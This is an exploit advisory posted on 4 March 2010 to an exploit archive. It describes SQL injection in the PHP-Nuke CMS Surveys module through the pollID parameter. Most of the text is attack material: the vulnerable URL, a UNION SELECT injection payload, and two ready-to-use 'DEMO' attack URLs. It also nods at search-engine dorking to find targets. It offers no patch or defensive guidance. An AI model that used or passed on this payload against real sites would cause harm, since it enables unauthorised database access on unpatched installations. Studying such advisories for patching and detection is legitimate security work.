PHP-NUKE CMS (Survey and Poll) SQL Injection Vulnerability

Posted on 04 March 2010
=========================================================
PHPNUKE CMS (Survey and Poll) SQL Injection Vulnerability
=========================================================

#############################################################################################################
## Tittle :PHPNUKE CMS ( Survey&poll ) SQLi Vulner                                                         ##
## Date : Thursday  04 March, 2010                                                                         ##
## Location : - INDONESIA -                                                                                ##
#############################################################################################################
[+] CMS INFO
[+] Name : PHPNUKE CMS
[+] Vendor : http://phpnuke.org/
[+] Download : http://phpnuke.org/modules.php?name=Downloads
[+] Vulnerability : SQL
[+] Dork : "Dork Just for newbie"
#############################################################################################################
 
[ Vulnerable File ]
 
[+] http://127.0.0.1/[senot]/modules.php?name=Surveys&op=results&pollID=[INDONESIANCODER]
 
 
[ XpL ]
 
[+] +and+1=2+union+select+1,version(),3,4--
 
 
[ DEMO ]
 
[+] http://server/modules.php?name=Surveys&op=results&pollID=5+and+1=2+union+select+1,version%28%29,3,4--
 
[+] http://server/default.php?go=modules.php%3Fname%3DSurveys%26op%3Dresults%26pollID%3D132+and+1=2+union+select+1,version%28%29,3,4--
 
#############################################################################################################


# ~  - [ [ : Inj3ct0r : ] ]
TOP
Malware :

None in database
Last 20
Exploits :

Last 20